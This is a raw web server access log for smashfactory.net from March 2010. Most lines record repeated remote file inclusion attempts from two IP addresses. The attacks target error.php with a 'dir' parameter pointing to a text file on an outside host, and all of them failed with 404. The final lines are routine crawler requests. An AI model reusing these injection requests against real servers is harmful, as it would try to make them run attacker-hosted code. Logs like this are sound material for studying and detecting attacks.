85.214.108.69 - - [09/Mar/2010:22:16:59 -0800] "GET /logs//error.php?dir=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "smashfactory.net"
85.214.108.69 - - [09/Mar/2010:22:16:59 -0800] "GET /logs/access.log//error.php?dir=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "smashfactory.net"
85.214.108.69 - - [09/Mar/2010:22:16:59 -0800] "GET /error.php?dir=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "smashfactory.net"
194.109.22.115 - - [09/Mar/2010:22:17:57 -0800] "GET /logs/access.log//error.php?dir=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "smashfactory.net"
194.109.22.115 - - [09/Mar/2010:22:17:57 -0800] "GET /logs//error.php?dir=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "smashfactory.net"
194.109.22.115 - - [09/Mar/2010:22:17:58 -0800] "GET /error.php?dir=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "smashfactory.net"
85.214.108.69 - - [09/Mar/2010:22:20:36 -0800] "GET /logs/access_100205.log%20%20//error.php?dir=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.smashfactory.net"
85.214.108.69 - - [09/Mar/2010:22:20:36 -0800] "GET /error.php?dir=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.smashfactory.net"
85.214.108.69 - - [09/Mar/2010:22:20:36 -0800] "GET /logs//error.php?dir=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.smashfactory.net"
194.109.22.115 - - [09/Mar/2010:22:20:44 -0800] "GET /logs/access.log%20%20//error.php?dir=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "smashfactory.net"
194.109.22.115 - - [09/Mar/2010:22:20:45 -0800] "GET /logs//error.php?dir=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "smashfactory.net"
194.109.22.115 - - [09/Mar/2010:22:20:45 -0800] "GET /error.php?dir=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "smashfactory.net"
85.214.108.69 - - [09/Mar/2010:22:20:49 -0800] "GET /logs/access_100205.log//error.php?dir=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.smashfactory.net"
85.214.108.69 - - [09/Mar/2010:22:20:49 -0800] "GET /error.php?dir=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.smashfactory.net"
85.214.108.69 - - [09/Mar/2010:22:20:49 -0800] "GET /logs//error.php?dir=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.smashfactory.net"
38.107.191.114 - - [09/Mar/2010:22:21:24 -0800] "GET /robots.txt HTTP/1.1" 404 - "-" "CCBot/1.0 (+http://www.commoncrawl.org/bot.html)" "www.smashfactory.net"
38.107.191.110 - - [09/Mar/2010:22:21:28 -0800] "GET /logs/ HTTP/1.1" 200 1224 "-" "CCBot/1.0 (+http://www.commoncrawl.org/bot.html)" "www.smashfactory.net"
38.107.191.111 - - [09/Mar/2010:22:21:32 -0800] "GET / HTTP/1.1" 200 779 "-" "CCBot/1.0 (+http://www.commoncrawl.org/bot.html)" "www.smashfactory.net"
38.107.191.112 - - [09/Mar/2010:22:21:36 -0800] "GET /tmp/ HTTP/1.1" 200 520 "-" "CCBot/1.0 (+http://www.commoncrawl.org/bot.html)" "www.smashfactory.net"
38.107.191.113 - - [09/Mar/2010:22:21:40 -0800] "GET /robots.txt HTTP/1.1" 404 - "-" "CCBot/1.0 (+http://www.commoncrawl.org/bot.html)" "smashfactory.net"